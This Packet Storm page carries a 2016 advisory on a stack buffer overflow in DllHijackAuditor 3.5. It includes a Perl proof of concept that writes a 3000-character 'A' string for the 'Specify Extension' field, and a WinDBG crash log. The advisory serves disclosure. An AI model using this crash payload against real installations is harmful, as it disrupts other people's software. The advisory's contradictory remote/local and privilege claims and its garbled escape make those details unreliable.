what you don't know can hurt you

DLL Hijack Auditor 3.5 Stack Buffer Overflow

DLL Hijack Auditor 3.5 Stack Buffer Overflow
Posted Sep 20, 2016
Authored by ZwX

DLL Hijack Auditor version 3.5 suffers from a stack buffer overflow vulnerability.

tags | exploit, overflow
systems | windows
MD5 | 15d0d9d4a77e44e9cd4644119567b3ab

DLL Hijack Auditor 3.5 Stack Buffer Overflow

Change Mirror Download
i>>?Document Title:
===============
DllHijackAuditor 3.5 - Stack Overflow Vulnerability


Release Date:
=============
2016-09-10


Common Vulnerability Scoring System:
====================================
6.1


Product & Service Introduction:
===============================
DLL Hijack Auditor is the smart tool to Audit against the Dll Hijacking Vulnerability in any Windows application.
This is one of the critical security issue affecting almost all Windows systems. Though most of the apps have been fixed, but still many Windows applications are susceptible to this vulnerability which can allow any attacker to completely take over the system.
DllHijackAuditor helps in discovering all such Vulnerable Dlls in a Windows application which otherwise can lead to successful exploitation resulting in total compromise of the system.

(Copy of the Homepage: http://securityxploded.com/)


Vulnerability Disclosure Timeline:
==================================
2016-09-10: Discovered Vulnerability
2016-09-11: Contact Vendor By Email
2016-09-20: Vendor No Response
2016-09-20: Public Disclosure


Affected Product(s):
====================
Product: DllHijackAuditor v3.5


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
A local stack buffer overflow vulnerability has been discovered in the official DllHijackAuditor v3.5 software.
The overflow vulnerability allows remote attackers to take-over the process by overwrite of the active registers.

The stack buffer overflow vulnerability is located in the `Specify Extension Entry` module of the software. Local attackers are
able to include unicode as malicious payload to crash software via stack overflow. Thus allows the local attacker to
overwrite for example the eip register to take control of the vulnerable software process.

The security risk of the issue is estimated as high with a cvss (common vulnerability scoring system) count of 6.1.
Exploitation of the vulnerability requires a low privilege or restricted system user account without user interaction.
Successful exploitation of the vulnerability results in computer system manipulation and compromise of the computer system.

Vulnerable Input(s):
[+] Specify Extension - (Entry)


Proof of Concept (PoC):
=======================
A local stack overflow vulnerability can be exploited by local attackers without user interaction and with privileged system user account.
For security demonstration or to reproduce the sofwtare vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Launch the DllHijackAuditors.exe software process
2. Run the code in perl and a file format (.txt) will create
3. Copy the AAAAAAAAA+... string from DllHijackAuditor.txt to clipboard
4. Paste it to the input Specify Extension AAAAAAAAA+... string and click `Start Audit` to process
5. Software crash permanently by a stack overflow
6. Successfully reproduce of the local stack buffer overflow vulnerability!


PoC: Exploit Code (Perl)
#!/usr/bin/perl
my $Buff = "x41" x 3000;
open(MYFILE,'>>DllHijackAuditor.txt');
print MYFILE $Buff;
close(MYFILE);
print " POC Created by ZwXn";


--- PoC Debug Session Logs [WinDBG] ---
Stack buffer overflow - code c0000409 (!!! second chance !!!)
eax=00000001 ebx=0059c60c ecx=00000005 edx=773913f0 esi=0766fc7c edi=0014d2c0
eip=00529e5b esp=0766f5b8 ebp=0766f5d0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
DllHijackAuditor+0x129e5b:
00529e5b cd29 int 29h

EXCEPTION_RECORD: ffffffff -- (.exr ffffffffffffffff)
ExceptionAddress: 00529e5b (DllHijackAuditor+0x00129e5b)
ExceptionCode: c0000409 (Stack buffer overflow)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 00000005

FAULTING_THREAD: 00000754
BUGCHECK_STR: STACK_OVERRUN
PROCESS_NAME: DllHijackAuditor.exe
FAULTING_MODULE: 77300000 ntdll
DEBUG_FLR_IMAGE_TIMESTAMP: 534bb17f
ERROR_CODE: (NTSTATUS) 0xc0000409 - Le syst me a d tect la saturation de la m moire tampon dans cette application. Cette saturation pourrait permettre un utilisateur mal intentionn de prendre le contr le de cette application.
DEFAULT_BUCKET_ID: WRONG_SYMBOLS
LAST_CONTROL_TRANSFER: from 00529e49 to 00529e5b

0:004> d esi
0766fc7c 00 3a 5c 55 73 65 72 73-5c 5a 77 58 5c 41 70 70 .:\Users\ZwX\App
0766fc8c 44 61 74 61 5c 4c 6f 63-61 6c 5c 54 65 6d 70 5c Data\Local\Temp\
0766fc9c 44 6c 6c 48 69 6a 61 63-6b 41 75 64 69 74 5f 41 DllHijackAudit_A
0766fcac 70 70 43 72 61 73 68 56-69 65 77 2e 65 78 65 5f ppCrashView.exe_
0766fcbc 32 30 30 34 37 33 35 35-33 36 5c 74 65 73 74 2e 2004735536\test.
0766fccc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0766fcdc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0766fcec 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0:004> d 0766fcec
0766fcec 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0766fcfc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0766fd0c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0766fd1c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0766fd2c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0766fd3c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0766fd4c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0766fd5c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA


Solution - Fix & Patch:
=======================
Restrict the number of characters in the input of the Specify Extension Entry module and allocate the memory.


Security Risk:
==============
The security risk of the local stack buffer overflow vulnerability in the software is estimated as high. (CVSS 6.1)


[+] Disclaimer [+]
===================
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.


Domain: www.zwx.fr
Contact: msk4@live.fr
Social: twitter.com/XSSed.fr
Feeds: www.zwx.fr/feed/
Advisory: www.vulnerability-lab.com/show.php?user=ZwX
packetstormsecurity.com/files/author/12026/
0day.today/author/27461


Copyright A(c) 2016 | ZwX - Security Researcher (Software & web application)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    4 Files
  • 20
    Apr 20th
    5 Files
  • 21
    Apr 21st
    1 Files
  • 22
    Apr 22nd
    10 Files
  • 23
    Apr 23rd
    22 Files
  • 24
    Apr 24th
    4 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close